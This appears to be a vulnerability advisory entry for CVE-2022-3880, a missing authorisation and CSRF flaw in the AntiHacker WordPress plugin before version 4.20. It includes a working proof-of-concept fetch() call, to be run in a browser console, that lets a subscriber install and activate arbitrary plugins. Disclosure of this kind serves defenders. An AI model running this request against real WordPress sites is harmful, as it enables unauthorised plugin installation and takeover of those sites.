Lucene search
Lana CodesWPEX-ID:24743C72-310F-41E9-AAC9-E05B2BB1A14EHistoryNov 21, 2022 - 12:00 a.m.
AntiHacker < 4.20 - Subscriber+ Arbitrary Plugin Installation
2022-11-2100:00:00
Lana Codes
119
antihacker
plugin installation
web browser
developer console
blog
subscriber user
classic-editor
exploit
EPSS
0.001
Percentile
37.7%
The plugin does not have proper authorisation and CSRF in an AJAX action, allowing any authenticated users, such as subscriber to call it and install and activate arbitrary plugins from wordpress.org
Run the below command in the developer console of the web browser while being on the blog as a subscriber user to install and activate the classic-editor plugin
fetch('/wp-admin/admin-ajax.php', {
method: 'POST',
headers: new Headers({
'Content-Type': 'application/x-www-form-urlencoded',
}),
body: 'action=antihacker_install_plugin&slug=classic-editor',
redirect: 'follow'
}).then(response => response.text()).then(result => console.log(result)).catch(error => console.log('error', error));
Related
cvelist
cvelist
CVE-2022-3880 AntiHacker < 4.20 - Subscriber+ Arbitrary Plugin Installation
2022-12-12 17:54:54
prion
prion
Cross site request forgery (csrf)
2022-12-12 18:15:00
nvd
nvd
CVE-2022-3880
2022-12-12 18:15:11
cve
cve
CVE-2022-3880
2022-12-12 18:15:11
wpvulndb
wpvulndb
AntiHacker < 4.20 - Subscriber+ Arbitrary Plugin Installation
2022-11-21 00:00:00
patchstack
patchstack